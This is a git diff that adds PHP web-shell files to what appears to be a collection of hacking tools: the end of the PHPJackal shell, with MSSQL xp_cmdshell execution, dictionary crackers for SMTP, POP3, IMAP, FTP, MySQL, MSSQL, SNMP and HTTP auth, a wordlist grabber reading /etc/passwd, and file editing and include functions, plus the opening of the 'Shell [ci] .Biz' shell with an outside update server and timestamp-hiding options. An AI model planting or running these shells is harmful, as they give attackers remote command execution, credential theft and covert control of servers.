'</pre></font>'; +} +elseif(!empty($_REQUEST['serveR']) && !empty($_REQUEST['coM']) && !empty($_REQUEST['dB']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS'])){ +$res=''; +$tb=uniqid('NJ'); +$db=mssql_connect($_REQUEST['serveR'],$_REQUEST['useR'],$_REQUEST['pasS']); +mssql_select_db($_REQUEST['dB'],$db); +mssql_query("create table $tb ( string VARCHAR (500) NULL)",$db); +mssql_query("insert into $tb EXEC master.dbo.xp_cmdshell '".$_REQUEST['coM']."'",$db); +$re=mssql_query("select * from $tb",$db); +while(($row=mssql_fetch_row($re))) +{ +$res.= $row[0]."\r\n"; +} +mssql_query("drop table $tb",$db); +mssql_close($db); +echo "<center><textarea rows='18' cols='64'>$res</textarea></center><br>"; +} +$f=(!empty($_REQUEST['file']))?htmlspecialchars($_REQUEST['file']):'/etc/passwd'; +$u=(!empty($_REQUEST['user']))?htmlspecialchars($_REQUEST['user']):'root'; +$p=(!empty($_REQUEST['pass']))?htmlspecialchars($_REQUEST['pass']):'123456'; +$d=(!empty($_REQUEST['db']))?htmlspecialchars($_REQUEST['db']):'test'; +echo "<center>${t}Use PHP Bugs:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>File:</td><td bgcolor='#666666'><input type=text value='$f' name=file size=35></td></tr><tr><td bgcolor='#808080'></td><td bgcolor='#808080' align=right>$hcwd<input class=buttons type=submit name=read value='Read File'><input class=buttons type=submit name=show value='Show directory'></form>$et<br>${t}Use MySQL:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>File:</td><td bgcolor='#666666'><input type=text value='$f' name=file size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Username:</td><td bgcolor='#808080'><input type=text name=user value='$u'></td></tr><tr><td width='20%' bgcolor='#666666'>Password:</td><td bgcolor='#666666'><input type=text name=pass value='$p'></td></tr><tr><td width='20%' bgcolor='#808080'>Database:</td><td bgcolor='#808080'><input type=text name=db 
value='$d'></td></tr><tr><td bgcolor='#666666'></td><td bgcolor='#666666' align=right>$hcwd<input class=buttons type=submit name=sql value='Read'></form>$et<br>${t}MSSQL Exec:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>Server:</td><td bgcolor='#666666'><input type=text value='";if (!empty($_REQUEST['serveR'])) echo htmlspecialchars($_REQUEST['serveR']);else echo 'localhost'; echo "' name=serveR size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Username:</td><td bgcolor='#808080'><input type=text name=useR value='";if (!empty($_REQUEST['useR'])) echo htmlspecialchars($_REQUEST['useR']); else echo 'sa'; echo "' size=35></td></tr><tr><td width='20%' bgcolor='#666666'>Password:</td><td bgcolor='#666666'><input type=text name=pasS value='";if (!empty($_REQUEST['pasS'])) echo htmlspecialchars($_REQUEST['pasS']);echo "' size=35></td></tr><td width='20%' bgcolor='#808080'>Command:</td><td bgcolor='#808080'><input type=text name=coM value='";if (!empty($_REQUEST['coM'])) echo htmlspecialchars($_REQUEST['coM']);else echo 'dir c:';echo "' size=35></td></tr><tr><td bgcolor='#666666'>Database:</td><td bgcolor='#666666'><input type=text name=dB value='";if(isset($_REQUEST['dB'])) echo htmlspecialchars($_REQUEST['dB']);else echo 'master';echo "'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$hcwd<input class=buttons type=submit value='Execute'></form>$et</center>"; +} +function crackeR(){ +global $t,$et,$crack,$cwd; +$check=(!empty($_REQUEST['dictionary']) && !empty($_REQUEST['target']))?1:0; +if(!empty($_REQUEST['cracK']) && !$check){ +$c=htmlspecialchars($_REQUEST['cracK']); +echo "<center>$t$c cracker:$crack"; +} +elseif(!empty($_REQUEST['cracK']) && $check){ +$pro=strtolower($_REQUEST['cracK']).'checK'; +$target=$_REQUEST['target']; +$type=$_REQUEST['combo']; +$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:''; +$dictionary=fopen($_REQUEST['dictionary'],'r'); +if(isset($_REQUEST['loG'])&& 
!empty($_REQUEST['logfilE'])){$log=1;$file=$_REQUEST['logfilE'];}else $log=0; +if($dictionary){ +echo '<font color=blue>Cracking '.htmlspecialchars($target).'...<br>'; +while(!feof($dictionary)){ +if($type){ +$combo=trim(fgets($dictionary)," \n\r"); +$user=substr($combo,0,strpos($combo,':')); +$pass=substr($combo,strpos($combo,':')+1); +}else{ +$pass=trim(fgets($dictionary)," \n\r"); +} +$ret=$pro($target,$user,$pass,5); +if($ret==-1){echo "$errorbox Can not connect to server.$et";break;}else{ +if($ret){$x="U: $user P: $pass";echo "$x<br>";if($log)file_add_contentS($file,"$x\r\n");if(!$type)break;}} +} +echo '<br>Done</font>'; +fclose($dictionary); +} +else{ +echo "$errorbox Can not open dictionary.$et"; +} +} +else{ +echo "<center><table border=0 bgcolor=#333333><tr><td><a href='".hlinK("seC=hc&workingdiR=$cwd")."'>[Hash]</a> - <a href='".hlinK("seC=cr&cracK=SMTP&workingdiR=$cwd")."'>[SMTP]</a> - <a href='".hlinK("seC=cr&cracK=POP3&workingdiR=$cwd")."'>[POP3]</a> - <a href='".hlinK("seC=cr&cracK=IMAP&workingdiR=$cwd")."'>[IMAP]</a> - <a href='".hlinK("seC=cr&cracK=FTP&workingdiR=$cwd")."'>[FTP]</a> - <a href='".hlinK("seC=snmp&workingdiR=$cwd")."'>[SNMP]</a> - <a href='".hlinK("seC=cr&cracK=MySQL&workingdiR=$cwd")."'>[MySQL]</a> - <a href='".hlinK("seC=cr&cracK=MSSQL&workingdiR=$cwd")."'>[MSSQL]</a> - <a href='".hlinK("seC=fcr&workingdiR=$cwd")."'>[HTTP Form]</a> - <a href='".hlinK("seC=auth&workingdiR=$cwd")."'>[HTTP Auth(basic)]</a> - <a href='".hlinK("seC=dic&workingdiR=$cwd")."'>[Dictionary maker]</a>$et</center>"; +} +} +function snmpcrackeR(){ +global $t,$et,$errorbox,$hcwd; +if(!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ +$target=$_REQUEST['target']; +if(isset($_REQUEST['loG'])&& !empty($_REQUEST['logfilE'])){$log=1;$file=$_REQUEST['logfilE'];}else $log=0; +$dictionary=fopen($_REQUEST['dictionary'],'r'); +if($dictionary){ +echo '<font color=blue>Cracking '.htmlspecialchars($target).'...<br>'; +while(!feof($dictionary)){ 
+$com=trim(fgets($dictionary)," \n\r"); +$res=snmpchecK($target,$com,2); +if($res){echo "$com<br>";if($log)file_add_contentS($file,"$com\r\n");} +} +echo '<br>Done</font>'; +fclose($dictionary); +} +else{ +echo "$errorbox Can not open dictionary.$et"; +} +}else echo "<center>${t}SNMP cracker:</td><td bgcolor='#333333'></td></tr><form method='POST'>$hcwd<tr><td width='20%' bgcolor='#666666'>Dictionary:</td><td bgcolor='#666666'><input type=text name=dictionary size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Server:</td><td bgcolor='#808080'><input type=text name=target size=35></td></tr><tr><td width='20%' bgcolor='#666666'><input type=checkbox name=loG value=1 onClick='document.form.logfilE.disabled = !document.form.logfilE.disabled;' style='border-width:1px;background-color:#666666;' checked>Log</td><td bgcolor='#666666'><input type=text name=logfilE size=25 value='".whereistmP().DIRECTORY_SEPARATOR.".log'> <input class=buttons type=submit value=Start></form>$et</center>"; +} +function dicmakeR(){ +global $errorbox,$windows,$footer,$t,$et,$hcwd; +$combo=(empty($_REQUEST['combo']))?0:1; +if(!empty($_REQUEST['range'])&& !empty($_REQUEST['output']) && !empty($_REQUEST['min']) && !empty($_REQUEST['max'])){ +$min=$_REQUEST['min']; +$max=$_REQUEST['max']; +if($max<$min)die($errorbox."Bad input!$et".$footer); +$s=$w=''; +$out=$_REQUEST['output']; +$r=$_REQUEST['range']; +$dic=fopen($out,'w'); +if($r==1){ +for($s=pow(10,$min-1);$s<pow(10,$max-1);$s++){ +$w=$s; +if($combo)$w="$w:$w"; +fwrite($dic,$w."\n"); +} +} +else{ +$s=str_repeat($r,$min); +while(strlen($s)<$max){ +$w=$s; +if($combo)$w="$w:$w"; +fwrite($dic,$w."\n"); +$s++; +} +} +fclose($dic); +echo '<font color=blue>Done</font>'; +} +elseif(!empty($_REQUEST['input']) && !empty($_REQUEST['output'])){ +$input=fopen($_REQUEST['input'],'r'); +if(!$input){ +if($windows)echo $errorbox.'Unable to read from '.htmlspecialchars($_REQUEST['input'])."$et<br>"; +else{ +$input=explode("\n",shelL("cat $input")); 
+$output=fopen($_REQUEST['output'],'w'); +if($output){ +foreach($input as $in){ +$user=$in; +$user=trim(fgets($in)," \n\r"); +if(!strstr($user,':'))continue; +$user=substr($user,0,(strpos($user,':'))); +if($combo)fwrite($output,$user.':'.$user."\n");else fwrite($output,$user."\n"); +} +fclose($input);fclose($output); +echo '<font color=blue>Done</font>'; +} +} +} +else{ +$output=fopen($_REQUEST['output'],'w'); +if($output){ +while(!feof($input)){ +$user=trim(fgets($input)," \n\r"); +if(!strstr($user,':'))continue; +$user=substr($user,0,(strpos($user,':'))); +if($combo)fwrite($output,$user.':'.$user."\n");else fwrite($output,$user."\n"); +} +fclose($input);fclose($output); +echo '<font color=blue>Done</font>'; +} +else echo $errorbox.' Unable to write data to '.htmlspecialchars($_REQUEST['input'])."$et<br>"; +} +}elseif(!empty($_REQUEST['url']) && !empty($_REQUEST['output'])){ +$res=downloadiT($_REQUEST['url'],$_REQUEST['output']); +if($combo && $res){ +$file=file($_REQUEST['output']); +$output=fopen($_REQUEST['output'],'w'); +foreach($file as $v)fwrite($output,"$v:$v\n"); +fclose($output); +} +echo '<font color=blue>Done</font>'; +}else{ +$temp=whereistmP().DIRECTORY_SEPARATOR; +echo "<center>${t}Wordlist generator:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>Range:</td><td bgcolor='#666666'><select name=range><option value=a>a-z</option><option value=A>A-Z</option><option value=1>0-9</option></select></td></tr><tr><td width='20%' bgcolor='#808080'>Min lenght:</td><td bgcolor='#808080'><select name=min><option value=1>1</option><option value=2>2</option><option value=3>3</option><option value=4>4</option><option value=5>5</option><option value=6>6</option><option value=7>7</option><option value=8>8</option><option value=9>9</option><option value=10>10</option></select></td></tr><tr><td width='20%' bgcolor='#666666'>Max lenght:</td><td bgcolor='#666666'><select name=max><option value=2>2</option><option 
value=3>3</option><option value=4>4</option><option value=5>5</option><option value=6>6</option><option value=7>7</option><option value=8 selected>8</option><option value=9>9</option><option value=10>10</option><option value=11>11</option><option value=12>12</option><option value=13>13</option><option value=14>14</option><option value=15>15</option></select></td></tr><tr><td width='20%' bgcolor='#808080'>Output:</td><td bgcolor='#808080'><input type=text value='$temp.dic' name=output size=35></td></tr><tr><td width='20%' bgcolor='#666666'></td><td bgcolor='#666666'><input type=checkbox name=combo style='border-width:1px;background-color:#666666;' value=1 checked>Combo style output</td></tr><td bgcolor='#808080'></td><td bgcolor='#808080' align=right>$hcwd<input class=buttons type=submit value=Make></form>$et<br>${t}Grab dictionary:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>Grab from:</td><td bgcolor='#666666'><input type=text value='/etc/passwd' name=input size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Output:</td><td bgcolor='#808080'><input type=text value='$temp.dic' name=output size=35></td></tr><tr><td width='20%' bgcolor='#666666'></td><td bgcolor='#666666'><input type=checkbox style='border-width:1px;background-color:#666666;' name=combo value=1 checked>Combo style output</td></tr><td bgcolor='#808080'></td><td bgcolor='#808080' align=right>$hcwd<input class=buttons type=submit value=Grab></form>$et<br>${t}Download dictionary:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>URL:</td><td bgcolor='#666666'><input type=text value='http://vburton.ncsa.uiuc.edu/wordlist.txt' name=url size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Output:</td><td bgcolor='#808080'><input type=text value='$temp.dic' name=output size=35></td></tr><tr><td width='20%' bgcolor='#666666'></td><td bgcolor='#666666'><input type=checkbox 
style='border-width:1px;background-color:#666666;' name=combo value=1 checked>Combo style output</td></tr><tr><td bgcolor='#808080'></td><td bgcolor='#808080' align=right>$hcwd<input class=buttons type=submit value=Get></form>$et</center>";} +} +function ftpclienT(){ +global $t,$cwd,$hcwd,$errorbox,$et; +$td="<td bgcolor='#333333' width='50%'>"; +if(!empty($_REQUEST['hosT']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS']) && function_exists('ftp_connect')){ +$user=$_REQUEST['useR'];$pass=$_REQUEST['pasS'];$host=$_REQUEST['hosT']; +$con=ftp_connect($_REQUEST['hosT'],21,10); +if($con){ +$ftp=ftp_login($con,$user,$pass); +if($ftp){ +if(!empty($_REQUEST['PWD']))ftp_chdir($con,$_REQUEST['PWD']); +if(!empty($_REQUEST['filE'])){ +$file=$_REQUEST['filE']; +$mode=(isset($_REQUEST['modE']))?FTP_BINARY:FTP_ASCII; +if(isset($_REQUEST['geT']))ftp_get($con,$file,$file,$mode); +elseif(isset($_REQUEST['puT']))ftp_put($con,$file,$file,$mode); +elseif(isset($_REQUEST['rM'])){ +ftp_rmdir($con,$file); +ftp_delete($con,$file); +} +elseif(isset($_REQUEST['mD']))ftp_mkdir($con,$file); +} +$pwd=ftp_pwd($con); +$dir=ftp_nlist($con,''); +$d=opendir($cwd); +echo "<table border=0 style='border-collapse: collapse' width='100%'><tr>${td}Server:</td>${td}Client:</td></tr><form method=POST><tr>$td<input type=text value='$pwd' name=PWD size=50><input value=Change class=buttons type=submit></td>$td<input size=50 type=text value='$cwd' name=workingdiR><input value=Change class=buttons type=submit></td></tr><tr>$td"; +foreach($dir as $n)echo "$n<br>"; +echo "</td>$td";while($cdir=readdir($d))if($cdir!='.' 
&& $cdir!='..')echo "$cdir<br>"; echo "</td></tr><tr>${td}Name:<input type=text name=filE><input type=checkbox style='border-width:1px;background-color:#333333;' name=modE value=1>Binary <input type=submit name=geT class=buttons value=Get><input type=submit name=puT class=buttons value=Put><input type=submit name=rM class=buttons value=Remove><input type=submit name=mD class=buttons value='Make dir'></td>$td<input type=hidden value='$user' name=useR><input type=hidden value='$pass' name=pasS><input type=hidden value='$host' name=hosT></form>$et"; +}else echo "$errorbox Wrong username or password$et"; +}else echo "$errorbox Can not connect to server!$et"; +} +else{ +echo "<center>${t}FTP cilent:</td><form name=client method='POST'><td bgcolor='#333333'></td></tr><tr><td width='20%' bgcolor='#666666'>Server:</td><td bgcolor='#666666'><input type=text value=localhost name=hosT size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Username:</td><td bgcolor='#808080'><input type=text name=useR value=anonymous size=35></td><tr><td width='20%' bgcolor='#666666'>Password:</td><td bgcolor='#666666'><input type=text value=admin@nasa.gov name=pasS size=35></td></tr><tr><td width='20%' bgcolor='#808080'></td><td bgcolor='#808080' align=right>$hcwd<input class=buttons type=submit value=Connect></form>$et</center>"; +} +} +function calC(){ +global $t,$et,$hcwd; +$fu=array('-','md5','sha1','crc32','hex','ip2long','decbin','dechex','hexdec','bindec','long2ip','base64_encode','base64_decode','urldecode','urlencode','des','strrev'); +if(!empty($_REQUEST['input']) && (in_array($_REQUEST['to'],$fu))){ +$to=$_REQUEST['to']; +echo "<center>${t}Output:<br><textarea rows='10' cols='64'>"; +if($to=='hex')for($i=0;$i<strlen($_REQUEST['input']);$i++)echo '%'.strtoupper(dechex(ord($_REQUEST['input']{$i}))); +else echo $to($_REQUEST['input']); +echo "</textarea>$et</center><br>"; +} +echo "<center>${t}Convertor:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' 
bgcolor='#666666'>Input:</td><td bgcolor='#666666'><textarea rows='10' name='input' cols='64'>";if(!empty($_REQUEST['input']))echo htmlspecialchars($_REQUEST['input']);echo "</textarea></td></tr><tr><td width='20%' bgcolor='#808080'>Task:</td><td bgcolor='#808080'><select size=1 name=to><option value=md5>MD5</option><option value=sha1>SHA1</option><option value=crc32>Crc32</option><option value=strrev>Reverse</option><option value=ip2long>IP to long</option><option value=long2ip>Long to IP</option><option value=decbin>Decimal to binary</option><option value=bindec>Binary to decimal</option><option value=dechex>Decimal to hex</option><option value=hexdec>Hex to decimal</option><option value=hex>ASCII to hex</option><option value=urlencode>URL encoding</option><option value=urldecode>URL decoding</option><option value=base64_encode>Base64 encoding</option><option value=base64_decode>Base64 decoding</option></select></td><tr><td width='20%' bgcolor='#666666'></td><td bgcolor='#666666' align=right><input class=buttons type=submit value=Convert>$hcwd</form>$et</center>"; +} +function authcrackeR(){ +global $errorbox,$et,$t,$hcwd; +if(!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ +if(isset($_REQUEST['loG'])&& !empty($_REQUEST['logfilE'])){$log=1;$file=$_REQUEST['logfilE'];}else $log=0; +$data=''; +$method=($_REQUEST['method'])?'POST':'GET'; +if(strstr($_REQUEST['target'],'?')){$data=substr($_REQUEST['target'],strpos($_REQUEST['target'],'?')+1);$_REQUEST['target']=substr($_REQUEST['target'],0,strpos($_REQUEST['target'],'?'));} +spliturL($_REQUEST['target'],$host,$page); +$type=$_REQUEST['combo']; +$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:''; +if($method=='GET')$page.=$data; +$dictionary=fopen($_REQUEST['dictionary'],'r'); +echo '<font color=blue>'; +while(!feof($dictionary)){ +if($type){ +$combo=trim(fgets($dictionary)," \n\r"); +$user=substr($combo,0,strpos($combo,':')); +$pass=substr($combo,strpos($combo,':')+1); +}else{ 
+$pass=trim(fgets($dictionary)," \n\r"); +} +$so=fsockopen($host,80,$en,$es,5); +if(!$so){echo "$errorbox Can not connect to host$et";break;} +else{ +$packet="$method /$page HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nConnection: Close\r\nAuthorization: Basic ".base64_encode("$user:$pass"); +if($method=='POST')$packet.='Content-Type: application/x-www-form-urlencoded\r\nContent-Length: '.strlen($data); +$packet.="\r\n\r\n"; +$packet.=$data; +fputs($so,$packet); +$res=substr(fgets($so),9,2); +fclose($so); +if($res=='20'){echo "U: $user P: $pass</br>";if($log)file_add_contentS($file,"U: $user P: $pass\r\n");} +} +} +echo 'Done!</font>'; +}else echo "<center><form method='POST' name=form>${t}HTTP Auth cracker:</td><td bgcolor='#333333'><select name=method><option value=1>POST</option><option value=0>GET</option></select></td></tr><tr><td width='20%' bgcolor='#666666'>Dictionary:</td><td bgcolor='#666666'><input type=text name=dictionary size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Dictionary type:</td><td bgcolor='#808080'><input type=radio name=combo checked value=0 onClick='document.form.user.disabled = false;' style='border-width:1px;background-color:#808080;'>Simple (P)<input type=radio value=1 name=combo onClick='document.form.user.disabled = true;' style='border-width:1px;background-color:#808080;'>Combo (U:P)</td></tr><tr><td width='20%' bgcolor='#666666'>Username:</td><td bgcolor='#666666'><input type=text size=35 value=root name=user></td></tr><tr><td width='20%' bgcolor='#808080'>Server:</td><td bgcolor='#808080'><input type=text name=target value=localhost size=35></td></tr><tr><td width='20%' bgcolor='#666666'><input type=checkbox name=loG value=1 onClick='document.form.logfilE.disabled = !document.form.logfilE.disabled;' style='border-width:1px;background-color:#666666;' checked>Log</td><td bgcolor='#666666'><input type=text name=logfilE size=25 value='".whereistmP().DIRECTORY_SEPARATOR.".log'> $hcwd <input 
class=buttons type=submit value=Start></form>$et</center>"; +} +function openiT($name){ +$ext=strtolower(substr($name,strrpos($name,'.')+1)); +$src=array('php','php3','php4','phps','phtml','phtm','inc'); +if(in_array($ext,$src))highlight_file($name); +else echo '<font color=blue><pre>'.htmlspecialchars(file_get_contents($name)).'</pre></font>'; +} +function opensesS($name){ +$sess=file_get_contents($name); +$var=explode(';',$sess); +echo "<pre>Name\tType\tValue\r\n"; +foreach($var as $v){ +$t=explode('|',$v); +$c=explode(':',$t[1]); +$y=''; +if($c[0]=='i')$y='Integer';elseif($c[0]=='s')$y='String';elseif($c[0]=='b')$y='Boolean';elseif($c[0]=='f')$y='Float';elseif($c[0]=='a')$y='Array';elseif($c[0]=='o')$y='Object';elseif($c[0]=='n')$y='Null'; +echo $t[0]."\t$y\t".$c[1]."\r\n"; +} +echo '</pre>'; +} +function logouT(){ +setcookie('passw','',time()-10000); +header('Location: '.hlinK()); +} +?> +<html> +<head> +<style>body{scrollbar-base-color: #484848; scrollbar-arrow-color: #FFFFFF; scrollbar-track-color: #969696;font-size:16px;font-family:"Arial Narrow";}Table {font-size: 15px;} .buttons{font-family:Verdana;font-size:10pt;font-weight:normal;font-style:normal;color:#FFFFFF;background-color:#555555;border-style:solid;border-width:1px;border-color:#FFFFFF;}textarea{border: 0px #000000 solid;background: #EEEEEE;color: #000000;}input{background: #EEEEEE;border-width:1px;border-style:solid;border-color:black}select{background: #EEEEEE; border: 0px #000000 none;}</style> +<meta http-equiv="Content-Language" content="en-us"> +<script language="JavaScript" type="text/JavaScript"> +function HS(box){ +if(document.getElementById(box).style.display!="none"){ +document.getElementById(box).style.display="none"; +document.getElementById('lk').innerHTML="+"; +} +else{ +document.getElementById(box).style.display=""; +document.getElementById('lk').innerHTML="-"; +} +} +function chmoD($file){ +$ch=prompt("Changing file mode["+$file+"]: ex. 
777",""); +if($ch != null)location.href="<?php echo hlinK('seC=fm&workingdiR='.addslashes($cwd).'&chmoD=');?>"+$file+"&modE="+$ch; +} +</script> +<title>PHPJackal [<?php echo $cwd; ?>]</title> +</head><body text="#E2E2E2" bgcolor="#C0C0C0" link="#DCDCDC" vlink="#DCDCDC" alink="#DCDCDC"> +<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#282828" bgcolor="#333333" width="100%"> +<tr><td><a href=javascript:history.back(1)>[Back]</a> - <a href="<?php echo hlinK("seC=sysinfo&workingdiR=$cwd");?>">[Info]</a> - <a href="<?php echo hlinK("seC=fm&workingdiR=$cwd");?>">[File manager]</a> - <a href="<?php echo hlinK("seC=edit&workingdiR=$cwd");?>">[Editor]</a> - <a href="<?php echo hlinK("seC=webshell&workingdiR=$cwd");?>">[Web shell]</a> - <a href="<?php echo hlinK("seC=br&workingdiR=$cwd");?>">[B/R shell]</a> - <a href="<?php echo hlinK("seC=asm&workingdiR=$cwd");?>">[Safe-mode]</a> - <a href="<?php echo hlinK("seC=sqlcl&workingdiR=$cwd"); ?>">[SQL]</a> - <a href="<?php echo hlinK("seC=ftpc&workingdiR=$cwd"); ?>">[FTP]</a> - <a href="<?php echo hlinK("seC=mailer&workingdiR=$cwd"); ?>">[Mail]</a> - <a href="<?php echo hlinK("seC=eval&workingdiR=$cwd");?>">[Evaler]</a> - <a href="<?php echo hlinK("seC=sc&workingdiR=$cwd"); ?>">[Scanners]</a> - <a href="<?php echo hlinK("seC=cr&workingdiR=$cwd");?>">[Crackers]</a> - <a href="<?php echo hlinK("seC=px&workingdiR=$cwd");?>">[Pr0xy]</a> - <a href="<?php echo hlinK("seC=tools&workingdiR=$cwd");?>">[Tools]</a> - <a href="<?php echo hlinK("seC=calc&workingdiR=$cwd");?>">[Convert]</a> - <a href="<?php echo hlinK("seC=about&workingdiR=$cwd");?>">[About]</a> <?php if(isset($_COOKIE['passw'])) echo "- [<a href='".hlinK("seC=logout")."'>Logout</a>]";?></td></tr></table> +<hr size=1 noshade> +<?php +if(!empty($_REQUEST['seC'])){ +switch($_REQUEST['seC']){ +case 'fm':filemanageR();break; +case 'sc':scanneR();break; +case 'phpinfo':phpinfo();break; +case 
'edit':if(!empty($_REQUEST['open']))editoR($_REQUEST['filE']);
+if(!empty($_REQUEST['Save'])){
+$filehandle=fopen($_REQUEST['file'],'w');
+fwrite($filehandle,$_REQUEST['edited']);
+fclose($filehandle);}
+if(!empty($_REQUEST['filE']))editoR($_REQUEST['filE']);else editoR('');
+break;
+case 'openit':openiT($_REQUEST['namE']);break;
+case 'cr':crackeR();break;
+case 'dic':dicmakeR();break;
+case 'tools':toolS();break;
+case 'hex':hexvieW();break;
+case 'img':showimagE($_REQUEST['filE']);break;
+case 'inc':if(file_exists($_REQUEST['filE']))include($_REQUEST['filE']);break;
+case 'hc':hashcrackeR();break;
+case 'fcr':formcrackeR();break;
+case 'auth':authcrackeR();break;
+case 'ftpc':ftpclienT();break;
+case 'eval':phpevaL();break;
+case 'snmp':snmpcrackeR();break;
+case 'px':pr0xy();break;
+case 'webshell':webshelL();break;
+case 'mailer':maileR();break;
+case 'br':brshelL();break;
+case 'asm':safemodE();break;
+case 'sqlcl':sqlclienT();break;
+case 'calc':calC();break;
+case 'sysinfo':sysinfO();break;
+case 'checksum':checksuM($_REQUEST['filE']);break;
+case 'logout':logouT();break;
+default: echo $intro;}}else echo $intro;
+echo $footer;?></body></html>
\ No newline at end of file
diff --git a/php/PHPshell/م€گPHPJackalم€‘/PHPJackal2.jpg b/php/PHPshell/م€گPHPJackalم€‘/PHPJackal2.jpg
new file mode 100644
index 0000000..d2ace7a
Binary files /dev/null and b/php/PHPshell/م€گPHPJackalم€‘/PHPJackal2.jpg differ
diff --git a/php/PHPshell/م€گPHPJackalم€‘/Thumbs.db b/php/PHPshell/م€گPHPJackalم€‘/Thumbs.db
new file mode 100644
index 0000000..3757c31
Binary files /dev/null and b/php/PHPshell/م€گPHPJackalم€‘/Thumbs.db differ
diff --git a/php/PHPshell/م€گShell [ci] .Biz was hereم€‘/Shell [ci] .Biz was here.jpg b/php/PHPshell/م€گShell [ci] .Biz was hereم€‘/Shell [ci] .Biz was here.jpg
new file mode 100644
index 0000000..d4dd2f5
Binary files /dev/null and b/php/PHPshell/م€گShell [ci] .Biz was hereم€‘/Shell [ci] .Biz was here.jpg differ
diff --git a/php/PHPshell/م€گShell [ci] .Biz was hereم€‘/Shell [ci] .Biz was here.php b/php/PHPshell/م€گShell [ci] .Biz was hereم€‘/Shell [ci] .Biz was here.php
new file mode 100644
index 0000000..e6247f4
--- /dev/null
+++ b/php/PHPshell/م€گShell [ci] .Biz was hereم€‘/Shell [ci] .Biz was here.php
@@ -0,0 +1,3149 @@ +<?php +//Starting calls +if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}} +error_reporting(5); +@ignore_user_abort(TRUE); +@set_magic_quotes_runtime(0); +$win = strtolower(substr(PHP_OS,0,3)) == "win"; +define("starttime",getmicrotime()); +if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);} +$_REQUEST = array_merge($_COOKIE,$_GET,$_POST); +foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}} + +$shver = "Shell [ci] .Biz was here"; //Current version +//CONFIGURATION AND SETTINGS +if (!empty($unset_surl)) {setcookie("k1r4_surl"); $surl = "";} +elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("k1r4_surl",$surl);} +else {$surl = $_REQUEST["k1r4_surl"]; //Set this cookie for manual SURL +} + +$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL. + +if ($surl_autofill_include and !$_REQUEST["k1r4_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}} +if (empty($surl)) +{ + $surl = "?".$includestr; //Self url +} +$surl = htmlspecialchars($surl); + +$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited. + + +$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1") +$login_txt = "Restricted area"; //http-auth message. 
+$accessdeniedmess = " Shell [ci] . Biz ".$shver.": access denied";
+
+$gzipencode = TRUE; //Encode with gzip?
+
+$updatenow = FALSE; //If TRUE, update now (this variable will be FALSE)
+
+$k1r4_updateurl = "http://emp3ror.com/kira//update/"; //Update server
+$k1r4_sourcesurl = "http://emp3ror.com/kira/"; //Sources-server
+
+$filestealth = TRUE; //if TRUE, don't change modify- and access-time
+
+$donated_html = "<center><b>Owned by Shell [ci] .Biz</b></center>";
+/* If you publish free shell and you wish
+add link to your site or any other information,
+put here your html. */
+$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html.
+
+$curdir = "./"; //start folder
+//$curdir = getenv("DOCUMENT_ROOT");
+$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp)
+$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...)
+
+$log_email = "yarakam@gmail.com"; //Default e-mail for sending logs
+
+$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending
+$sort_save = TRUE; //If TRUE then save sorting-position using cookies.
+
+// Registered file-types.
+// array(
+// "{action1}"=>array("ext1","ext2","ext3",...),
+// "{action2}"=>array("ext4","ext5","ext6",...),
+// ...
+// )
+$ftypes = array(
+ "html"=>array("html","htm","shtml"),
+ "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
+ "exe"=>array("sh","install","bat","cmd"),
+ "ini"=>array("ini","inf"),
+ "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
+ "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
+ "sdb"=>array("sdb"),
+ "phpsess"=>array("sess"),
